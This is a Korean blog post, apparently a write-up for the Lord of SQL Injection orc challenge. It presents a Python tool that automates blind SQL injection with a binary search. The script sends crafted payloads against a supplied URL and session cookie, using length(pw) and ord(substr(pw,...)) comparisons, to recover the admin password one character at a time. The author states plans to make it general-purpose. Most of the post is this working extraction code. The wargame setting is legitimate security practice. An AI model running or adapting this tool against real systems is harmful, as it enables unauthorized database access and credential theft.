Wargame/LOS(Load of SQL Injection) Writeup
AUTO blind SQL Tools (이진탐색버전) (feat. LOS no.4 orc)
Ate1es
2022. 2. 17. 14:57
오랜만에 Blind Sql Injection 문제를 풀다가 문득 툴이 만들고 싶어졌다.
만들다 보니 전체탐색이 비효율적으로 보였다.
.
.
.
그리하여 탄생한 BLIND SQL TOOL 이진탐색 Veeeeeersion!!!!
코드주인의 능지 이슈로 인해 코드 수정을 안하면 los 4번문제에서 밖에 돌아가지 않는다.
앞으로 범용성있게 바꿀 예정, (오랜만에 블로깅하나 할려고 억지로 들고왔다는건 안비밀)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
|
import requests
import time
header = {"cookie":""}
def get_list():
num_list = []
for i in range(23,123):
num_list.append(i)
return num_list
def input_data():
print("[*] BlIND SQL TOOL [*]")
print("----------------------")
url = str(input("[*] INPUT URL : "))
param = str(input("[*] INPUT PARAMETER : "))
cookie = str(input("[*] INPUT COOKIE(ex. SESSION=sess1234) : "))
speed = int(input("[*] INPUT SPEED LEVEL (1[min], 2, 3[max]) : "))
header["cookie"] = cookie
return find_length(url, speed, param)
def find_length(URL, speed, param):
num_list = get_list()
left = 0
right = len(num_list)-1
while left <= right:
time.sleep(5-speed)
mid = int((left + right) / 2)
query = "?{}= ' or length(pw)={} -- '".format(param, mid)
res = requests.get(URL+query, headers=header)
if "Hello admin" in res.text:
print("[*] Password Length : "+str(mid))
break
else:
query = "?{}= ' or length(pw)>{} -- '".format(param, mid)
res2 = requests.get(URL+query,headers=header)
if "Hello admin" in res2.text:
left = mid + 1
else:
right = mid - 1
return find_val(URL, speed, mid, param)
def find_val(URL, speed, length, param):
passwd = ""
num_list = get_list()
left = 0
right = len(num_list)-1
for i in range(1,length+1):
left = 0
right = len(num_list)-1
while left <= right:
time.sleep(5-speed)
mid = int((left + right) / 2)
query = "?{}=' or id='admin' and ord(substr(pw, {}, 1)) = '{}' -- '".format(param, i, num_list[mid])
res3 = requests.get(URL+query, headers=header)
if "Hello admin" in res3.text:
passwd = passwd + chr(int(num_list[mid]))
print("[*] Password : "+passwd)
break
else:
query = "?{}=' or id='admin' and ord(substr(pw, {}, 1))>'{}' -- '".format(param, i, num_list[mid])
res4 = requests.get(URL+query,headers=header)
if "Hello admin" in res4.text:
left = mid + 1
else:
right = mid - 1
if __name__=="__main__":
input_data()
|
cs |